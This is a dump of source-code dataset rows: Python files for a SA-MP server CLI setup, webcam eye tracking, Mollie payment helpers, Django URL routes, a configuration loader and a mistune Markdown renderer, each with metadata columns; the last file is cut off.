| en | 0.492856 | # file_path = Path("../instances/n5.txt").absolute() # file_path = Path("../instances/n6.txt").absolute() # file_path = Path("../instances/n10p4.txt").absolute() # file_path = Path("../instances/n15p5.txt").absolute() # file_path = Path("../instances/n29p7A.txt").absolute() # file_path = Path("../instances/n29p8B.txt").absolute() # file_path = Path("../instances/n40p11.txt").absolute() # file_path = Path("../instances/n52p11.txt").absolute() # file_path = Path("../instances_apa_cup/cup2.txt").absolute() # file_path = Path("../instances_apa_cup/cup3.txt").absolute() # print(origin, destination) # print('\n') # calculateSolution(vnd_solution, cost_matrix) # constructive algorithm solution # print(trp_agent_list) # showSolution(trp_solution) # variable neighbourhood descent solution # print(vnd_agent_list) # showSolution(vnd_solution) | 2.759387 | 3 |
setup.py | Zeex/samp-server-cli | 13 | 6623893 | <reponame>Zeex/samp-server-cli
from distutils.core import setup
# Packaging metadata for the samp-server-cli console tool.
# NOTE(review): ``entry_points``/console scripts are a setuptools feature and
# are not supported by ``distutils.core.setup``; ``distutils`` is also
# deprecated (PEP 632, removed in Python 3.12).  Consider switching the
# import above to ``from setuptools import setup``.
setup(
    name='samp-server-cli',
    version='1.0',
    author='Zeex',
    author_email='<EMAIL>',
    url='https://github.com/Zeex/samp-server-cli',
    description='Advanced CLI for GTA: San Andreas Multiplayer (SA-MP) server',
    license='BSD',
    py_modules = ['samp_server_cli'],
    entry_points = {
        'console_scripts': ['samp-server-cli=samp_server_cli:main']
    },
)
| from distutils.core import setup
# Packaging metadata for the samp-server-cli console tool.
# NOTE(review): ``entry_points``/console scripts are a setuptools feature and
# are not supported by ``distutils.core.setup``; ``distutils`` is also
# deprecated (PEP 632, removed in Python 3.12).  Consider switching the
# import above to ``from setuptools import setup``.
setup(
    name='samp-server-cli',
    version='1.0',
    author='Zeex',
    author_email='<EMAIL>',
    url='https://github.com/Zeex/samp-server-cli',
    description='Advanced CLI for GTA: San Andreas Multiplayer (SA-MP) server',
    license='BSD',
    py_modules = ['samp_server_cli'],
    entry_points = {
        'console_scripts': ['samp-server-cli=samp_server_cli:main']
    },
)
PythonProjects/Tracking/EyeTracking.py | vygasuresh/img | 263 | 6623894 | __author__ = 'Charlie'
"""Detect faces, eyes and pupil candidates in a video stream.

Uses Haar cascades for faces/eyes and a Hough circle transform for the
pupils, drawing the detections on each frame.  Press ``q`` to quit.
"""
import numpy as np
import cv2
import sys, inspect, os
import argparse
# Make the shared Image_Lib helpers importable relative to this file.
cmd_subfolder = os.path.realpath(
    os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "..","..", "Image_Lib")))
if cmd_subfolder not in sys.path:
    sys.path.insert(0, cmd_subfolder)
import image_utils as utils
# NOTE(review): the description below was copied from a face-blur script and
# does not match what this program does.
ap = argparse.ArgumentParser("Track and blur faces in video input")
ap.add_argument("-v", "--video", help="Path to video file. Defaults to webcam video")
args = vars(ap.parse_args())
# Use the default webcam unless a video file was supplied.
if not args.get("video", False):
    camera = cv2.VideoCapture(0)
else:
    camera = cv2.VideoCapture(args["video"])
face_cascade = cv2.CascadeClassifier('Image_Lib/Face_Data/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('Image_Lib/Face_Data/haarcascade_eye.xml')
while True:
    grabbed, frame = camera.read()
    if not grabbed:
        print("Camera read failed!")
        break
    frame = utils.image_resize(frame, height=600)
    gray_image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray_image, 1.3, 5)
    # Iterating an empty detection result is a no-op, so no length guard is
    # needed here.
    for (x, y, w, h) in faces:
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
        gray_roi = gray_image[y:y + h, x:x + w]
        color_roi = frame[y:y + h, x:x + w]
        eyes = eye_cascade.detectMultiScale(gray_roi, 1.1, 4)
        print(len(eyes))
        for ex, ey, ew, eh in eyes:
            cv2.rectangle(color_roi, (ex, ey), (ex + ew, ey + eh), (255, 255, 0), 2)
            gray_eye_roi = gray_roi[ey:ey + eh, ex:ex + ew]
            color_eye_roi = color_roi[ey:ey + eh, ex:ex + ew]
            circles = cv2.HoughCircles(gray_eye_roi, cv2.HOUGH_GRADIENT, 1, 20, minRadius=0)
            # BUG FIX: HoughCircles returns None (no detection) or an
            # ndarray; the original tested ``if not circles:`` which is
            # inverted and raises ValueError for multi-element arrays.
            if circles is not None:
                circles = np.uint16(np.around(circles))
                for cx, cy, radius in circles[0, :]:
                    # BUG FIX: cv2.circle takes center=(x, y) plus a separate
                    # radius; the original passed (x, y, r) as the center.
                    cv2.circle(color_eye_roi, (int(cx), int(cy)), int(radius), (0, 0, 255), 2)
                    cv2.circle(color_eye_roi, (int(cx), int(cy)), 2, (0, 255, 255), 2)
    cv2.imshow("Output", frame)
    if cv2.waitKey(1) & 0xFF == ord("q"):
        break
camera.release()
cv2.destroyAllWindows()
| __author__ = 'Charlie'
# Face/eye/pupil tracking demo: Haar cascades for faces and eyes, Hough
# circles for pupil candidates.  Written for Python 2 (print statements).
import numpy as np
import cv2
import sys, inspect, os
import argparse
# Make the shared Image_Lib helpers importable relative to this file.
cmd_subfolder = os.path.realpath(
    os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "..","..", "Image_Lib")))
if cmd_subfolder not in sys.path:
    sys.path.insert(0, cmd_subfolder)
import image_utils as utils
# NOTE(review): the description was copied from a face-blur script and does
# not match what this program does.
ap = argparse.ArgumentParser("Track and blur faces in video input")
ap.add_argument("-v", "--video", help="Path to video file. Defaults to webcam video")
args = vars(ap.parse_args())
# Use the default webcam unless a video file was supplied.
if not args.get("video", False):
    camera = cv2.VideoCapture(0)
else:
    camera = cv2.VideoCapture(args["video"])
face_cascade = cv2.CascadeClassifier('Image_Lib/Face_Data/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('Image_Lib/Face_Data/haarcascade_eye.xml')
while True:
    grabbed, frame = camera.read()
    if not grabbed:
        print "Camera read failed!"
        break
    frame = utils.image_resize(frame, height=600)
    gray_image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray_image, 1.3, 5)
    if len(faces) > 0:
        for (x, y, w, h) in faces:
            cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
            gray_roi = gray_image[y:y + h, x:x + w]
            color_roi = frame[y:y + h, x:x + w]
            eyes = eye_cascade.detectMultiScale(gray_roi, 1.1, 4)
            print len(eyes)
            if len(eyes) > 0:
                for ex, ey, ew, eh in eyes:
                    cv2.rectangle(color_roi, (ex, ey), (ex + ew, ey + eh), (255, 255, 0), 2)
                    gray_eye_roi = gray_roi[ey:ey + eh, ex:ex + ew]
                    color_eye_roi = color_roi[ey:ey + eh, ex:ex + ew]
                    circles = cv2.HoughCircles(gray_eye_roi, cv2.HOUGH_GRADIENT, 1, 20, minRadius=0)
                    # NOTE(review): BUG -- HoughCircles returns None or an
                    # ndarray, so this condition is inverted and raises
                    # ValueError for multi-element arrays; it should read
                    # ``if circles is not None:``.
                    if not circles:
                        try:
                            circles = np.uint16(np.around(circles))
                            for i in circles[0, :]:
                                # NOTE(review): BUG -- cv2.circle expects
                                # center=(x, y) plus a separate radius, not a
                                # 3-tuple center.
                                cv2.circle(color_eye_roi, (i[0], i[1], i[2]), (0, 0, 255), 2)
                                cv2.circle(color_eye_roi, (i[0], i[1]), 2, (0, 255, 255), 2)
                        except AttributeError:
                            print "circles return empty!"
                            continue
    cv2.imshow("Output", frame)
    if cv2.waitKey(1) & 0xFF == ord("q"):
        break
camera.release()
cv2.destroyAllWindows()
| none | 1 | 2.387135 | 2 | |
mollie/ideal/utils.py | nederhoed/django-mollie-ideal | 9 | 6623895 | <reponame>nederhoed/django-mollie-ideal
#-*- coding: utf-8 -*-
from decimal import Decimal
from mollie.ideal.helpers import _get_mollie_xml, get_mollie_bank_choices
from mollie.ideal.settings import MOLLIE_BTW, MOLLIE_TRANSACTION_FEE
def query_mollie(request_dict, mode):
    """Perform a 'check' or 'fetch' request against Mollie.

    The action is added to *request_dict*, the XML round-trip is done by
    ``_get_mollie_xml`` and the relevant order fields are returned as a
    plain dict.  Raises ValueError for any other *mode*.
    """
    valid_modes = ('check', 'fetch')
    if mode not in valid_modes:
        raise ValueError("Invalid mode. Valid modes are '%s' and '%s'." % valid_modes)
    request_dict['a'] = mode
    order = _get_mollie_xml(request_dict).find('order')
    response_dict = {'transaction_id': order.findtext('transaction_id')}
    if mode == 'fetch':
        response_dict['order_url'] = order.findtext('URL')
    elif mode == 'check':
        response_dict['paid'] = order.findtext('payed') # sic!
        consumer = order.find('consumer')
        # NOTE(review): key 'consumerAcount' (missing 'c') looks like a typo,
        # but it is kept as-is for compatibility with existing callers.
        response_dict['consumerAcount'] = consumer.findtext('consumerAccount')
        response_dict['consumerCity'] = consumer.findtext('consumerCity')
        response_dict['consumerName'] = consumer.findtext('consumerName')
    return response_dict
def get_mollie_fee(btw=MOLLIE_BTW, fee=MOLLIE_TRANSACTION_FEE):
    """Return the transaction fee with VAT (BTW, a percentage) added,
    quantized to two decimal places."""
    vat_percentage = Decimal(btw)
    total = Decimal(fee)
    total += ((vat_percentage / 100) * total)
    return total.quantize(Decimal(10) ** -2)
# Public alias kept for backwards compatibility.
get_mollie_banklist = get_mollie_bank_choices
| #-*- coding: utf-8 -*-
from decimal import Decimal
from mollie.ideal.helpers import _get_mollie_xml, get_mollie_bank_choices
from mollie.ideal.settings import MOLLIE_BTW, MOLLIE_TRANSACTION_FEE
def query_mollie(request_dict, mode):
    """Send a 'check' or 'fetch' request to Mollie and return the parsed
    order fields as a dict.  Raises ValueError for any other *mode*.
    """
    valid_modes = ('check', 'fetch')
    if mode not in valid_modes:
        raise ValueError("Invalid mode. Valid modes are '%s' and '%s'." % valid_modes)
    request_dict['a'] = mode
    parsed_xml = _get_mollie_xml(request_dict)
    order = parsed_xml.find('order')
    response_dict = dict()
    response_dict['transaction_id'] = order.findtext('transaction_id')
    if mode == 'fetch':
        response_dict['order_url'] = order.findtext('URL')
    elif mode == 'check':
        response_dict['paid'] = order.findtext('payed') # sic!
        consumer = order.find('consumer')
        # NOTE(review): 'consumerAcount' (missing 'c') looks like a typo, but
        # changing the key would break existing consumers of this dict.
        response_dict['consumerAcount'] = consumer.findtext('consumerAccount')
        response_dict['consumerCity'] = consumer.findtext('consumerCity')
        response_dict['consumerName'] = consumer.findtext('consumerName')
    return response_dict
def get_mollie_fee(btw=MOLLIE_BTW, fee=MOLLIE_TRANSACTION_FEE):
    """Return the transaction fee with VAT (BTW, a percentage) added,
    quantized to two decimal places.

    Note: the defaults are captured once at import time.
    """
    btw = Decimal(btw)
    fee = Decimal(fee)
    fee += ((btw / 100) * fee)
    return fee.quantize(Decimal(10) ** -2)
get_mollie_banklist = get_mollie_bank_choices | en | 0.67096 | #-*- coding: utf-8 -*- # sic! | 2.06502 | 2 |
DICOMOFFIS/urls.py | pfagomez/DICOMOFFIS | 0 | 6623896 | from django.urls import path, include
from django.shortcuts import redirect
from DICOMOFFIS import views
# URL routes for the DICOM pages of the OFFIS site.  Route names mirror the
# (German) page slugs so templates can reverse them with {% url %}.
urlpatterns =[
    path("",views.home, name =("home")),
    # /home/ is an alias that redirects to the root page.
    path('home/' , lambda req: redirect('/')),
    # General DICOM information pages.
    path('allgemeines/', views.allgemeines, name= ('allgemeines')),
    path('allgemeines/dicom-einfuehrung', views.dicom_einfuehrung, name= ('dicom-einfuehrung')),
    path('allgemeines/standardisierung/', views.standardisierung, name=("standardisierung")),
    # DCMTK toolkit pages.
    path('dcmtk/', views.dcmtk, name = ('dcmtk') ),
    path('dcmtk/dcmtk-einfuehrung', views.dcmtk_einfuehrung, name = ('dcmtk-einfuehrung') ),
    path('dcmtk/softwareentwicklung-mit-dcmtk', views.softwareentwicklung_mit_dcmtk, name = ('softwareentwicklung-mit-dcmtk') ),
    path('dcmtk/dcmtk-tools', views.dcmtk_tools, name = ('dcmtk-tools') ),
    path('dcmtk/spenden', views.spenden, name = ('spenden') ),
    path('dcmtk/support', views.support, name = ('support') ),
    # DCMTK extension modules.
    path('dcmtk-erweiterungsmodule/', views.dcmtk_erweiterungsmodule, name=('dcmtk-erweiterungsmodule')),
    path('dcmtk-erweiterungsmodule/dcmjp2k', views.dcmjp2k, name=('dcmjp2k')),
    path('dcmtk-erweiterungsmodule/dcmppscu', views.dcmppscu, name=('dcmppscu')),
    path('dcmtk-erweiterungsmodule/dcmprint', views.dcmprint, name=('dcmprint')),
    path('dcmtk-erweiterungsmodule/dcmstcom', views.dcmstcom, name=('dcmstcom')),
    path('dcmtk-erweiterungsmodule/ppsmgr', views.ppsmgr, name=('ppsmgr')),
    path('dcmtk-erweiterungsmodule/testversionen', views.test_versionen, name=('testversionen')),
    path('dcmtk-erweiterungsmodule/dcmpps', views.dcmpps, name=('dcmpps')),
    path('dicomscope/', views.dicomscope, name = ("dicomscope")),
    # Contact and consulting/training service pages.
    path('kontakt/', views.kontakt, name = ("kontakt")),
    path('kontakt/ansprechpartner', views.ansprechpartner, name = ("ansprechpartner")),
    path('dienstleistungen/', views.dienstleistungen, name = ("dienstleistungen")),
    path('dienstleistungen/dicom-beratung', views.dicom_beratung, name = ("dicom-beratung")),
    path('dienstleistungen/dicom-schulung', views.dicom_schulung, name = ("dicom-schulung")),
    path('dienstleistungen/ihe-schulung', views.ihe_schulung, name = ("ihe-schulung")),
    path('dienstleistungen/hl7-schulung', views.hl7_schulung, name = ("hl7-schulung")),
    # Legal pages.
    path('datenschutz/', views.datenschutz, name = ("datenschutz")),
    path('impressum/', views.impressum, name = ("impressum")),
]
| from django.urls import path, include
from django.shortcuts import redirect
from DICOMOFFIS import views
# URL routes for the DICOM pages of the OFFIS site.  Route names mirror the
# (German) page slugs so templates can reverse them with {% url %}.
urlpatterns =[
    path("",views.home, name =("home")),
    # /home/ is an alias that redirects to the root page.
    path('home/' , lambda req: redirect('/')),
    # General DICOM information pages.
    path('allgemeines/', views.allgemeines, name= ('allgemeines')),
    path('allgemeines/dicom-einfuehrung', views.dicom_einfuehrung, name= ('dicom-einfuehrung')),
    path('allgemeines/standardisierung/', views.standardisierung, name=("standardisierung")),
    # DCMTK toolkit pages.
    path('dcmtk/', views.dcmtk, name = ('dcmtk') ),
    path('dcmtk/dcmtk-einfuehrung', views.dcmtk_einfuehrung, name = ('dcmtk-einfuehrung') ),
    path('dcmtk/softwareentwicklung-mit-dcmtk', views.softwareentwicklung_mit_dcmtk, name = ('softwareentwicklung-mit-dcmtk') ),
    path('dcmtk/dcmtk-tools', views.dcmtk_tools, name = ('dcmtk-tools') ),
    path('dcmtk/spenden', views.spenden, name = ('spenden') ),
    path('dcmtk/support', views.support, name = ('support') ),
    # DCMTK extension modules.
    path('dcmtk-erweiterungsmodule/', views.dcmtk_erweiterungsmodule, name=('dcmtk-erweiterungsmodule')),
    path('dcmtk-erweiterungsmodule/dcmjp2k', views.dcmjp2k, name=('dcmjp2k')),
    path('dcmtk-erweiterungsmodule/dcmppscu', views.dcmppscu, name=('dcmppscu')),
    path('dcmtk-erweiterungsmodule/dcmprint', views.dcmprint, name=('dcmprint')),
    path('dcmtk-erweiterungsmodule/dcmstcom', views.dcmstcom, name=('dcmstcom')),
    path('dcmtk-erweiterungsmodule/ppsmgr', views.ppsmgr, name=('ppsmgr')),
    path('dcmtk-erweiterungsmodule/testversionen', views.test_versionen, name=('testversionen')),
    path('dcmtk-erweiterungsmodule/dcmpps', views.dcmpps, name=('dcmpps')),
    path('dicomscope/', views.dicomscope, name = ("dicomscope")),
    # Contact and consulting/training service pages.
    path('kontakt/', views.kontakt, name = ("kontakt")),
    path('kontakt/ansprechpartner', views.ansprechpartner, name = ("ansprechpartner")),
    path('dienstleistungen/', views.dienstleistungen, name = ("dienstleistungen")),
    path('dienstleistungen/dicom-beratung', views.dicom_beratung, name = ("dicom-beratung")),
    path('dienstleistungen/dicom-schulung', views.dicom_schulung, name = ("dicom-schulung")),
    path('dienstleistungen/ihe-schulung', views.ihe_schulung, name = ("ihe-schulung")),
    path('dienstleistungen/hl7-schulung', views.hl7_schulung, name = ("hl7-schulung")),
    # Legal pages.
    path('datenschutz/', views.datenschutz, name = ("datenschutz")),
    path('impressum/', views.impressum, name = ("impressum")),
]
| none | 1 | 1.805697 | 2 | |
src/ciptools/configuration.py | uwcip/python-ciptools | 0 | 6623897 | import errno
import inspect
import logging
import os
import sys
from pathlib import Path
from types import ModuleType
from typing import Any, Tuple, Union
import ciptools.resources
logger = logging.getLogger(__name__)
# this configuration loader was taken from the Flask configuration loader
# the original can be found here: https://github.com/pallets/flask/blob/main/src/flask/config.py
class ConfigurationLoader(dict):
    """A dict populated from the UPPERCASE names of a configuration source.

    Security: configuration sources are executed with ``exec``, so they
    must come from a trusted location -- never load untrusted input.
    """
    def __init__(self, defaults: dict = None):
        """Initialize, optionally seeded with *defaults*."""
        dict.__init__(self, defaults or {})
    def from_string(self, data: str):
        """Execute *data* as Python code and load its UPPERCASE names."""
        d = ModuleType("configuration")
        d.__file__ = "string"
        exec(compile(data, "string", "exec"), d.__dict__)  # noqa S102
        self.from_object(d)
        return True
    def from_pyfile(self, filename: Union[str, Path], silent: bool = False):
        """Execute the Python file *filename* and load its UPPERCASE names.

        Returns False instead of raising when *silent* is true and the
        file is missing or is a directory.
        """
        d = ModuleType("configuration")
        d.__file__ = filename
        try:
            with open(filename, mode="rb") as config_file:
                exec(compile(config_file.read(), filename, "exec"), d.__dict__)  # noqa S102
        except IOError as e:
            if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR):
                return False
            e.strerror = "unable to load configuration file ({})".format(e.strerror)
            raise
        self.from_object(d)
        return True
    def from_object(self, obj: Any):
        """Copy every UPPERCASE attribute of *obj* into this dict; a string
        *obj* is first resolved via :meth:`import_string`."""
        if isinstance(obj, str):
            obj = self.import_string(obj)
        for key in dir(obj):
            if key.isupper():
                self[key] = getattr(obj, key)
    @staticmethod
    def import_string(import_name, silent=False):
        """Import and return the object named by the dotted (or colon)
        path *import_name*; suppress ImportError when *silent* is true."""
        import_name = str(import_name).replace(":", ".")
        try:
            try:
                __import__(import_name)
            except ImportError:
                if "." not in import_name:
                    raise
            else:
                return sys.modules[import_name]
            # Not importable as a module: split off the attribute name and
            # fetch it from the parent module.
            module_name, obj_name = import_name.rsplit(".", 1)
            module = __import__(module_name, globals(), locals(), [obj_name])
            try:
                return getattr(module, obj_name)
            except AttributeError as e:
                raise ImportError(e) from None
        except ImportError:
            if not silent:
                raise
def load_configuration(package: str = None, path: str = None, environment: str = None) -> Tuple[str, ConfigurationLoader]:
    """Load the ``{environment}.conf`` configuration.

    Search order: an explicit *package* of bundled configurations, then an
    explicit *path* (or the ``CONFIGURATIONS`` environment variable), then
    a ``configurations`` package next to the caller.  *environment*
    defaults to ``$ENVIRONMENT`` or ``"development"``.

    Returns the resolved environment name and the loaded configuration.
    """
    configuration = ConfigurationLoader()
    if environment is None:
        environment = os.environ.get("ENVIRONMENT") or "development"
    if package is None:
        if path is None:
            path = os.environ.get("CONFIGURATIONS")
        if path is None:
            # load from a package called "{calling_package}.configurations"
            # (inspect the caller's frame to discover its package)
            calling_package = inspect.currentframe().f_back.f_globals["__package__"]
            if calling_package:
                package = ".".join([calling_package, "configurations"])
            else:
                package = "configurations"
            configuration.from_string(ciptools.resources.files(package).joinpath(f"{environment}.conf").read_text())
        else:
            path = os.path.join(path, f"{environment}.conf")
            logger.info(f"loading configuration from '{path}'")
            configuration.from_pyfile(path)
    else:
        configuration.from_string(ciptools.resources.files(package).joinpath(f"{environment}.conf").read_text())
    return environment, configuration
| import errno
import inspect
import logging
import os
import sys
from pathlib import Path
from types import ModuleType
from typing import Any, Tuple, Union
import ciptools.resources
logger = logging.getLogger(__name__)
# this configuration loader was taken from the Flask configuration loader
# the original can be found here: https://github.com/pallets/flask/blob/main/src/flask/config.py
class ConfigurationLoader(dict):
    """A dict populated from the UPPERCASE names of a configuration source.

    Security: configuration sources are executed with ``exec``, so they
    must come from a trusted location -- never load untrusted input.
    """
    def __init__(self, defaults: dict = None):
        """Initialize, optionally seeded with *defaults*."""
        dict.__init__(self, defaults or {})
    def from_string(self, data: str):
        """Execute *data* as Python code and load its UPPERCASE names."""
        d = ModuleType("configuration")
        d.__file__ = "string"
        exec(compile(data, "string", "exec"), d.__dict__)  # noqa S102
        self.from_object(d)
        return True
    def from_pyfile(self, filename: Union[str, Path], silent: bool = False):
        """Execute the Python file *filename* and load its UPPERCASE names.

        Returns False instead of raising when *silent* is true and the
        file is missing or is a directory.
        """
        d = ModuleType("configuration")
        d.__file__ = filename
        try:
            with open(filename, mode="rb") as config_file:
                exec(compile(config_file.read(), filename, "exec"), d.__dict__)  # noqa S102
        except IOError as e:
            if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR):
                return False
            e.strerror = "unable to load configuration file ({})".format(e.strerror)
            raise
        self.from_object(d)
        return True
    def from_object(self, obj: Any):
        """Copy every UPPERCASE attribute of *obj* into this dict; a string
        *obj* is first resolved via :meth:`import_string`."""
        if isinstance(obj, str):
            obj = self.import_string(obj)
        for key in dir(obj):
            if key.isupper():
                self[key] = getattr(obj, key)
    @staticmethod
    def import_string(import_name, silent=False):
        """Import and return the object named by the dotted (or colon)
        path *import_name*; suppress ImportError when *silent* is true."""
        import_name = str(import_name).replace(":", ".")
        try:
            try:
                __import__(import_name)
            except ImportError:
                if "." not in import_name:
                    raise
            else:
                return sys.modules[import_name]
            # Not importable as a module: split off the attribute name and
            # fetch it from the parent module.
            module_name, obj_name = import_name.rsplit(".", 1)
            module = __import__(module_name, globals(), locals(), [obj_name])
            try:
                return getattr(module, obj_name)
            except AttributeError as e:
                raise ImportError(e) from None
        except ImportError:
            if not silent:
                raise
def load_configuration(package: str = None, path: str = None, environment: str = None) -> Tuple[str, ConfigurationLoader]:
    """Load the ``{environment}.conf`` configuration.

    Search order: an explicit *package* of bundled configurations, then an
    explicit *path* (or the ``CONFIGURATIONS`` environment variable), then
    a ``configurations`` package next to the caller.  *environment*
    defaults to ``$ENVIRONMENT`` or ``"development"``.

    Returns the resolved environment name and the loaded configuration.
    """
    configuration = ConfigurationLoader()
    if environment is None:
        environment = os.environ.get("ENVIRONMENT") or "development"
    if package is None:
        if path is None:
            path = os.environ.get("CONFIGURATIONS")
        if path is None:
            # load from a package called "{calling_package}.configurations"
            # (inspect the caller's frame to discover its package)
            calling_package = inspect.currentframe().f_back.f_globals["__package__"]
            if calling_package:
                package = ".".join([calling_package, "configurations"])
            else:
                package = "configurations"
            configuration.from_string(ciptools.resources.files(package).joinpath(f"{environment}.conf").read_text())
        else:
            path = os.path.join(path, f"{environment}.conf")
            logger.info(f"loading configuration from '{path}'")
            configuration.from_pyfile(path)
    else:
        configuration.from_string(ciptools.resources.files(package).joinpath(f"{environment}.conf").read_text())
    return environment, configuration
| en | 0.833538 | # this configuration loader was taken from the Flask configuration loader # the original can be found here: https://github.com/pallets/flask/blob/main/src/flask/config.py # noqa S102 # noqa S102 # load from a package called "{calling_package}.configurations" | 2.253013 | 2 |
ticket/mistune_custom_renderer.py | Xena89/bp-master | 3 | 6623898 | ''''
Copyright (c) 2014 - 2015, <NAME>
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the creator nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from mistune import BlockLexer, Renderer, Markdown
import re
class CustomLexer(BlockLexer):
    """Mistune block lexer that records a start offset for ordered lists
    beginning at a number greater than 1 (e.g. ``3. item``)."""
    def parse_list_block(self, m):
        """Tokenize a list block, adding an ``offset`` field to the
        ``list_start`` token for the renderer to pick up."""
        bull = m.group(2)
        # get the list number if starting higher than 1
        off = bull[:-1] if ('.' in bull and int(bull[:-1])>1) else ''
        self.tokens.append({
            'type': 'list_start',
            'ordered': '.' in bull,
            'offset': off,
        })
        self._list_depth += 1
        # Beyond the maximum nesting depth, emit the whole match as a plain
        # text item instead of recursing further.
        if self._list_depth > self._max_recursive_depth:
            self.tokens.append({'type': 'list_item_start'})
            self.parse_text(m)
            self.tokens.append({'type': 'list_item_end'})
        else:
            cap = m.group(0)
            self._process_list_item(cap, bull)
        self.tokens.append({'type': 'list_end'})
        self._list_depth -= 1
class ListRenderer(Renderer):
    """Markdown renderer supporting offset (``start=``) and task lists."""
    def list(self, body, offset, ordered=True):
        """Rendering list tags like ``<ul>`` and ``<ol>``.
        :param body: body contents of the list.
        :param offset: start offset of the list or None if not present
        :param ordered: whether this list is ordered or not.
        :return String: listblock as HTML
        """
        tag = 'ul'
        if ordered:
            tag = 'ol'
        # A non-empty string offset becomes an HTML start attribute.
        if isinstance(offset,str) and offset:
            tag += ' start="'+ offset +'"'
        return '<%s>\n%s</%s>\n' % (tag, body, tag)
    def list_item(self, text):
        """Rendering list item snippet. Like ``<li>``.

        Converts a leading ``[ ]`` / ``[x]`` / ``[X]`` marker into a
        (disabled) HTML checkbox for GitHub-style task lists.
        :return String: listitem as HTML
        """
        checkbox = ""
        # if listitem begins with an [ xX]
        if re.match(r'^\[([ Xx])\]\s(.*)', text):
            # if listitem begins with [ ]
            if re.match(r'^\[([\s])\]',text):
                # checkbox is not checked
                checkbox = '<input disabled="" type="checkbox">'
                # removes [ ] from listitem
                text = text.replace('[ ]','',1)
            # if listitem begins with [x] or [X]
            if re.match(r'^\[([Xx])\]',text):
                # checkbox is checked
                checkbox = '<input checked="" disabled="" type="checkbox">'
                # removes [Xx]
                # BUG FIX: pattern was a non-raw string ('\[' is an invalid
                # escape sequence and warns on modern Python); the raw string
                # below is byte-identical to the old pattern.
                text = re.sub(r'\[([Xx])\]','',text,1)
        return '<li>%s%s</li>\n' % (checkbox, text)
class CustomMarkdown(Markdown):
    """Markdown parser that forwards the ``offset`` recorded by the lexer
    to the renderer so offset lists can carry a ``start`` attribute.

    return: String - parsed markdown list as html
    """
    def output_list(self):
        """Collect the rendered items of the current list and hand them,
        together with the list's offset, to the renderer."""
        ordered = self.token['ordered']
        off = self.token.get('offset')
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_end':
            body += self.tok()
        return self.renderer.list(body, off, ordered)
| ''''
Copyright (c) 2014 - 2015, <NAME>
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the creator nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from mistune import BlockLexer, Renderer, Markdown
import re
class CustomLexer(BlockLexer):
"""
custom mistune blocklexer
adds functionality for offset list items
"""
def parse_list_block(self, m):
bull = m.group(2)
# get the list number if starting higher than 1
off = bull[:-1] if ('.' in bull and int(bull[:-1])>1) else ''
self.tokens.append({
'type': 'list_start',
'ordered': '.' in bull,
'offset': off,
})
self._list_depth += 1
if self._list_depth > self._max_recursive_depth:
self.tokens.append({'type': 'list_item_start'})
self.parse_text(m)
self.tokens.append({'type': 'list_item_end'})
else:
cap = m.group(0)
self._process_list_item(cap, bull)
self.tokens.append({'type': 'list_end'})
self._list_depth -= 1
class ListRenderer(Renderer):
"""
custom markdown renderer for support offset and task lists
"""
def list(self, body, offset, ordered=True):
